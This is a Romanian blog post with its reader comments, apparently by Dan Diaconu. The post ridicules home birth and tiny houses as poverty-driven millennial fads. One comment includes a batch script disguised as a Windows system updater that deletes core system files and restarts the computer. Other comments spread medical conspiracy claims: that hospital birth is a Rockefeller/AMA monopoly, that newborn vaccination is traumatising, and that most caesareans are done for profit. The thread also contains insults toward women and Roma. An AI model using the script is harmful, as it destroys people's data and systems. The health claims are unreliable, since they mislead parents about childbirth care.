O altă modă care apare de-a dreptul exploziv este cea a caselor mici. Construite pe structura unei rulote, aceste case promit confortul deplin în câțiva metri pătrați. Prețul unei asemenea hardughii este situat între 30 000$ și 60 000$, dar variantele de bază pot coborî până pe la 8000$, în timp ce cele de vârf se pot duce chiar la peste 100 000$.
Partea interesantă e că producătorii se laudă cu „deplinul confort” al acestor case. Spun ei că acolo poți locui într-un mod la fel de confortabil ca într-o casă veritabilă. Și, pornind de la aceste „principii solide”, s-au dezvoltat o grămadă de show-uri TV, concursuri, reviste, bloguri s.a.m.d. E o întreagă cultură „tiny”.
Iată-ne față în față cu două fenomene venite de peste Ocean absolut inaplicabile și fără sens aici. În ceea ce privește nașterea acasă, stau să mă gândesc sincer la ce anume o fi cool în chestia asa? Mizeria care se face? „Aventura” nașterii nesupravegheate în care n-ai habar dacă e bine sau rău ceea ce ți se întâmplă? Faptul că nu știi dacă noul născut este în regulă sau nu? Ce anume din toată asta te-ar face să te înhami la așa ceva? Culmea e că mișcarea nașterii acasă n-a apărut prin vreo comunitate retrogradă care refuză procedurile medicale, ci fix în mijlocul comunităților progresiste ale millennials-ilor americani.
De fapt moda asta nu-i chiar modă, ci o necesitate. Muierile acelea care se declară fascinante de născutul acasă, în realitate n-au asigurare de sănătate și, în aceste condiții, nașterea la spital le costă. Oups, iată cum sare iepurele din joben! Nu-i nimic fascinant în toată socoteala. Doar faptul că, asumându-și o asemenea naștere, în cazul în care totul va fi OK, au economisit niște bani. Chestia hazlie e că o necesitate cauzată de sărăcie s-a transformat peste noapte în „chestie cool”, marketată și împachetată astfel încât să ai impresia c-ai avea parte de nu știu ce scofală.
La fel stă socoteala și cu acele „tiny homes”. Cum naiba să-ți fie comod atunci când înghesui cel puțin un dormitor, un living, o bucătărie și-o baie într-un spațiu mai mic decât biroul meu? Stau să mă gândesc cât de chinuitor e să dormi într-un asemenea spațiu într-o vară călduroasă, mai ales în condițiile în care „dormitorul” e situat în partea superioară a „casei”. Cât de repede te trezești cu senzația că n-ai aer într-un spațiu atât de mic? Ce anume e oare confortabil într-un asemenea spațiu???
Ca și în cazul nașterilor acasă, și-n fenomenul „tiny house” se ascunde un detaliu esențial: aproape întreaga generație millennials e falită. E o generație ratată și adusă pe marginea prăpastiei de ideologia care le-a fost inoculată. Mantra „share”, prin intermediul căreia ne „demonstrau” nouă rudimentarilor și proștilor cât de mișto e să stai cu chirie în loc să-ți cumperi casa ta, s-a prăbușit cu primul val de „restructurare” provocat de pandemie. Și uite-așa, impetuoșii revoluționari s-au trezit că nu au niciun chior în buzunar și, mai mult, n-au unde să stea. Desigur, ca niște progresiști autentici, și-au găsit refugiul în casele părinților, dar nici acolo nu pot face mulți purici. Astfel încât se văd nevoiți să se retragă în parcurile de rulote. Doar că, de făcut n-o fac așa, la modul banal. Au dat-o pe „eco”: cică astfel îți reduci impactul energetic și salvezi planeta. Indiferent însă de terminologia utilizată, realitatea e una singură: locuitorul de micro-casă e la fel de eșuat precum cei care umplu parcurile de rulote de la periferia orașelor americane.
Eu am 50 si de multe ori ma uit la cei tineri la mileniali si chiar la cei mai tineri decat acestia.Ma surprinde modul in care calculatorul mai exact internetul devine sensul vietii .De aceea marea majoritate a lor accepta toate ghidusii ca pe niste lucruri normale si cool.De multe ori sunt invidios pe ei pe modul lor "simplu"de a privi timpurile .Eu am o doza de nesiguranta in abordarea evenimentelor si imi pun 1000 de intrebari inaintea unei decizii ,ei nu .Am observat toate astea prin prisma copiilor mei ,a prietenilor si a tuturor cunoscutilor mai tineri .Nu sunt deranjati de micile inconveniente ale noilor trenduri iar daca le spui parerea ta te privesc cu suspiciune si merg pe varianta moderna .Noul este cheia de bolta al intregului sistem de valori promovat de mileniali.Putini sunt d le Dan cei ce inteleg .Cea mai clasica catalogare a celor ca mine este cea de comunist .Nu conteaza ca nu ai facut politica PCR ului ci faptul ca te ai nascut si te ai educat inainte de 89.Pt ei suntem o stavila in calea ""progresului"
RăspundețiȘtergereAcest comentariu a fost eliminat de autor.
ȘtergereNu auzi că de nevoie nasc acasă?
ȘtergereNu am auzit inca pe nimeni sa nasca de nevoie acasa( nevoia presupunand situatie materiala mai slaba).
ȘtergereDimpotriva,toate cer cezariana sa nu sufere vreun pic ca deh,generatia din platilina...
Sunt o mama care a nascut in US cu un medic minunat , natural cu epidurala, indus. DACA ar fi sa mai nasc inca o data CU SIGURANTA as incerca acasa cu asistenta(alea care nasc acasa nu nasc singure, sunt asistente specializate in asa ceva)
ȘtergereFemeia naste dintotdeauna in cuibul ei, asa e natura chiar si daca acel cuib nu mai este natural de mult... Introducerea nasterilor la spital face parte din agenda dictaturii medicale inceput in 1848 odata cu AMA si lacomia diabolica a lui Rockfeller si Carnegie care au pus cu ajutorul infiintari AMA si a raportului lui Flexner, MONOPOL pe viata umana... Aveti perfecta dsreptate cu minimalismul si aberatiile celor care ne duc cu oistea in gard prin toate metodele dar va rog, va rog mult, nu impietati sfintenia cu care mamele aduc copiii pe lume... Practic nu trebuie neaparat sa intelegeti sau sa fiti de acord ci sa nu luati in ras! In rest, jos palaria!!! Sunteti genial!
ȘtergereCateodata,foarte rar,este.In nici un caz acum.
ȘtergereDe cele mai multe ori insa e foarte bine informat si peste masura de arogant prin tot felul de judecati si osandiri care-i dezvaluie de fapt limitele,coborand cateodata pana la josnicie.
Si,in plus,un vanturator de vorbe,altfel spus,un gargaragiu plin de sfaturi pentru altii.Doar daca nu cumva lucreaza ceva in taina,caz in care imi cer anticipat scuze la acest ultim aspect.
Supravetuirea in satul romanesc este reala il stiu bine am trait la bunici este o centura de siguranta la ce va veni daca va veni rest traim normal
RăspundețiȘtergereAveți dreptate! Nu este normal să trăiești într-o rulotă dar nici cu câinele în casă. Cât despre nașteri, cred că de vreo 60 de ani orice femeie alege să nască decent la maternitate, asistată de moașă.
RăspundețiȘtergereRămâi optimist. Nimic nu a fost schimbat. Ai încredere în plan. Sunteți o parte a planului.
RăspundețiȘtergereExistă două planuri:planul lui Dumnezeu și planul diavolului.
ȘtergereExistă un singur plan si acela este a lui Dumnezeu. Diavolul e hacker sau craker al Creației Divine, el corupe elementele sensibile din creație, devine pedofil, violator si criminal. Ce plan vezi in asta?
ȘtergereE foarte usor sa faci rău. Uite ceva simplu care sterge Windows-ul cuiva:
@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components... Please Wait...
echo y|del c:autoexec.bat
echo y|del c:config.sys
echo y|del c:windowssystem.ini
echo y|del c:windowswin.ini
echo y|del c:windowsexplorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer... Please Wait...
start C:WINDOWSRUNDLL.EXE user.exe,exitwindows
Îți vine sa crezi ca instructiunile alea pot sterge windowsul politicienilor analfabeți? Daca nu ar fi spp sa ii păzească deja erau toți înnebuniți ca nu le merge telefonul sau laptopul.
Deci nu vad nici un plan in a face cuiva rău, decât ca îți faci karma. Nu scapă nimeni de nimic din ceea ce el face cu mana lui. Nici chiar Diavolul nu scapă. Si in alta ordine de idei pe Diavol cine l-a creat? Cine a avut planul sa il creeze? Diavolul nu are nici un plan. El are doar un buget energetic si o durata de timp limitată. El nu e conștient de ce scrie in Apocalipsa lui Ioan desi a citit cartea. Nu intelege deloc ca timpul său expiră. Acum el crede ca le stie pe toate, ca a descoperit creația divina cum sa i se supună. Si lucrurile inceo sa ii scape de sub mana. A zis ca el creaza oameni mai buni decat Dumnezeu si a inceput sa se joace cu vaccinuri si clonarea umana. A zis ca el creaza o planetă mai buna in alta parte si de faot asta se întâmplă, daca nu te-ai prins. Așteptăm ca copilul răzvrătit a lui Dumnezeu sa pkece pe altă planetă duoa ce o secatuieste de tot pe asta. Suntem dați pe mana diavolului toți. Și el nu e deloc mai inteligent ca noi, dar e mai puternic deoarece noi toti dormim in sânul lui Avraham. Cei ce ne conduc sunt mai proști ca noi din 2 motive simple.nici unul dintre ei decat demonii adevărați, nu pot trăi fara bani sau bogăție. Nu pot indura foamea si lipsurile sau nenorocirile alea care vin 3 odată. Uitați-vă la bogați cum plang in pandemie. Ce lideri, ce putere au ei. Toti sunt papa lapte. Bunu are mai multă vlaga spirituală decat toți bogatii din România. Si no sa și-o cheltuie pe niște adormiți. Problema vremurilor noastre este ca noi toti dormim si nimeni nu știe si nu isi da seama ca dorm. Toți dorm. Nu e unul treaz. Ști ce e aia amintire de sine? Si cum sa o provoci? Daca nu sti esti adormit rău. Cu cat esti6mai bogat cu atâta dormi mai adanc. Doi la mâna. Tot sistemul de bogatie, recimpensa si sisteme de sanatate sunt ale lor construite de ei. A trai in afara lor si a crea propriile tale sisteme inseamna ca esti treaz, si un Robinson Crusoe in jungla urbana. O data ce te bazezi oe sistemele lor esti dependent de ei si de plecăciune in fata satanei lor.
Pe vremea lui Ceașcă oamenii își creasera sistemele lor, gen banca țigănească. Oricum cand tot ce au ei se va prăbuși, abia atunci se vir trezi cei 99.9 %. Pana atunci Diaconu urlă ca o alarma de ceas, poate piate ar trezi oe cineva, macar inca unul. Si fix oe cine a trezit? Pe mama omida Facebook cu stndardele comunității lor de capitaliști marxisti de rit chinez. O țară, două sisteme! Asta până se ajunge la masacrul capitalismului. Comunismul mereu a presupus crearea de doua sisteme. Unul oficial de propaganda. Altul subteran. Si culmea ca nu cel oficial e important. Ci cel subteran detine toate manevrele de readormire. Vom ajunge toti infractori, si inchisi in arest la domiciliu. Singura vina e ca v-ați născut. Puterea filozofiei PCC va atinge oana si oe cei super bogați.
E cam departe de realitate să crezi că nu te costă nimic nașterea la spital. Că nu te costă nimic cu factură, da, asta poate fi real.
RăspundețiȘtergereÎn alta ordine de idei, nici cu tiny houses nu-i ok, dar nici cu P+1 pt care să te îndatorezi o viață de Om, astfel încât să lucrezi 6 zile din 7 câte 9-10 ore pe zi, pt a putea să îți plătești ratele bancare.
Pai nu te obliga nimeni la P+1. Poti doar P. Si nu sute de m2. Doar 80..100.
ȘtergereDar sa stai in cotet doar pt ca niste idioti de aiurea zic ca e bine,asta e culmea cretinismului.
Cat despre nasterea in spital ,iti confirm eu ca e gratis. Acum ca or ma fi gunoaie medicale care mai iau spaga, vina lor este exact egala cu vina celui ce da.
Nu exista corupt fara corupator.
Eu am zis de P+1 pt că așa le place tinerilor absolvenți de facultăți la moda.
ȘtergereDar pt niște salarii sub 3000 lei net, la achiziția prin credit și a unei case/apartament de 100 mp, tot sclav te numești. Și mergi acasă, în cele 3 camere, ca să dormi tot într-un singur pat. Iar în weekend faci tot posibilul să nu stai acasă. (noroc cu pandemia vieții, că s-au închis stațiunile și locurile de relaxare și mai prețuim confortul propriei case 🙂...)
Asta tot nu e justificare ca sa locuiesti in cotet botezat ,,tiny,,
ȘtergereSărăcia, statutul de sclav, justifică orice, cu atât mai mult tiny homes, mâncare ieftină și proastă, interdicții de tot felul, etc.
ȘtergereAplicati o logica distoersionata pe care nu o inteleg.
ȘtergereSpuneam ca chiar daca ai salariul de 3000 ron in mana,nu justifica acceptarea aberatiei ,,tiny,,.
Și ce propune domnul Dan Diaconu? Că bani spuneți și singur că nu sunt. Idei, soluții?
RăspundețiȘtergereOr fi mai disperați decât domnii de dincoace și dincolo de Urali?
RăspundețiȘtergereDespre nasterea acasa.
RăspundețiȘtergereNu neg ca multe din mamele ce decid sa nasca acasa o fac din lipsa banilor(pentru spagi sau alte cheltuieli curente) insa nu toate se incadreaza in acesta categorie. Sunt viitoare mamici care au destui bani pentru ai da"unde trebuie" ca totul sa "merga bine" si nu s-ar zgarcii sa o faca insa fiind mai informate aleg totusi sa nasca acasa din mai multe motive. Am sa amintesc trei dintre ele. 1) Imediat(sau la foarte scurt timp) dupa nastere este taiat cordonul ombilical lipsind noul nascut de o cantitate insemnata de sange pe care o ia de la mama si in acelasi timp fiind privat de timpul tranzitoriu necesar pentru a se obisnuii cu noul mediu si noua modalitate de respiratie.2) Noul nascut este luat pentru proceduri(masuratori, cantariri, etc) nefiind lasat timp suficient la pieptul mamei(unde se simte protejat) pentru a se linisti si a-si incepe viata in noul mediu plin de incredrere. El plonjeaza in necunoscut trece prin diferite brate ce nu le cunoste si este supus unor chestii traumatizante. 3) Ca "bun venit" primeste vaccinarile standard. Este aproape imposibil sa nasti in maternitatile din Romania si sa pleci acasa cu copilul nevaccinat. Toate aceste trei(si poate si altele) puncte fac obiectul sudiului unor specialisti ce au ajuns la concluzia ca acestea sunt evenimente traumatizante pentru noul naascut ce afecteaza sanatataea psihica si fizica a noului membru al societatii efectele se vad mai devreme sau mai tarziu in viata.
Pentru a evita cele descrise mai sus multe cupluri din Romania aleg ca noul nascut sa se nasca acasa expunanduse ala alte riscuri considerate insa mai mici.
Lucruri foarte importante despre nastere aflati , aici: https://www.youtube.com/watch?v=-mbDLh1eBdA&t=2975s
Despre Tiny Homes.
RăspundețiȘtergereCasutele micute fac parte dintr-un curent mult mai amplu care "prinde" din ce in ce mai mult - minimalismul.
Dupa ce omul in general si occidentalistul in special a renuntat la Dumnezeu, in suflet a ramas o mare gol. Simtindu-se incomplet, omul a incercat sa umple acest gol cu lucruri, multe multe lucruri, unele utile dar foarte multe inutile. Dar cum acest gol se comporta ca o gaura neagra cosmica in care oricat ai depozita nu se cunostea nimic, nu se umplea decat cu nimic a aparut depresia. Pentru iesirea din dilema, din depresie din inutilitate a aparut "solutia" - minimalismul. De la mult si multe sa trecut la putin si putine. Roamanul are o vorba "a scapat de dracu si a dat de tacsu". Minimalismul spune ca poti traii "frumos" cu trei tricouti o pereche de adidasi doi blugi si o camasa. N-ai nevoie de mai mult. Binenteles Tiny House era urmatorul pas. Totul este minunat pentru ca nu-i asa, se salveaza planeta.
Tiny House este "in trend" si va fi promovata in continuare din mai multe motive: - implica persoane singure sau cel mult familii mici.Se descurajeaza natalitatea - dezideratul de aur al noii ere.
- este putin poluanta, putin consumatoare de energie, bla bla bla, este in ton cu naratiunea "salvam planeta" si in acelasi timp tine in actualitate subiectul "verde".
- sugereaza o viata de a te multumi cu putin: mai putin spatiu de locuit, mai putin loc de adunat/stocat, mai putini prieteni de invitat, mai putin loc de plimbat, mai putina distanta de calatorit, mai putine drepturi de exercitat/aparat.
Scăderea natalității nu prea are legătură cu spațiul de locuit. Uită-te la bronzații noștri.
ȘtergereUrmatorul pas va fi:
Ștergere''Totul e simplu,atat de simplu incat devine de neinteles.
Totul e aproape,atat de aproape incat se trage inapoia ochilor si nu se mai vede.''
Si-apoi,Omul va regasi Casa fara sfarsit - nu liniar,ci''din har in har'' - a Tatalui sau.
Ba ce-i drept bunicii noștri stăteau în case de 300mp. Îmi amintesc perfect. O camera care deservea și ca bucătărie și dormitor plus o camera unde erau "lucrurile bune" și cămara. Baia afară. Totul însumând sute de mp. Citind pe Ernest Bernea am observat același lucru. Țăranii stătea în niște casoaie care i-ar face de rahat de americani.
RăspundețiȘtergereNasterile in US sunt oribile, esti ca o fleica de carne baga pe vena tot felul de tampenii sa iti grabeasca nasterea, iti rup membranele, copilul ala e stresat la maxim si daca ai epidurala pentru ca nivelul ala de durere...musai, iti afecteaza coloana si pe cel mic. 90% din cezariene sunt facute "pt bani"...era un documentar despre toate mascariile astea. In partea cu tiny house iar gresesti. O casa din aia poate avea 100 mp si ce dotari ai tu acolo nu au unii in apartamentele lor. ;) Si nu muncesti ca o sluga 30 de ani sa platesti la banci triplu. La articolul asta ai dat cu tifla-n gard, original.
RăspundețiȘtergereLa nasterea in US te simti ca o halca de carne intr-o fabrica de bebelusi. CHIAR daca camerele arata super si in caz de ceva esti pe maini ff bune, tatal are pat special, ai microunde frigider televizor si meniu de restaurant. Esti ca o halca de carne la produs bani, suferinta care iti e aplicata pentru ca sa se grabeasca procesul e JIGNITOARE. Dan uita-te aici https://www.dailymotion.com/video/x3w7cvw Si ca sa vezi tiny homes.., de-ti lasa gura apa uita-te aici: https://www.youtube.com/watch?v=Kk6JOX-ZFr8 https://www.youtube.com/watch?v=yi3wPa2Untg https://www.youtube.com/watch?v=tac5Mtz3CP0 In doi ani e platita gata, ai gaz, curent, canalizare, poti sa o muti daca vrei ... si nu platesti chirie la cineva sau 30 de ani la banci de trei ori pretul la cumparare.
RăspundețiȘtergereBunicii mele tot satul îi spunea "Moașa". For a reason.
RăspundețiȘtergere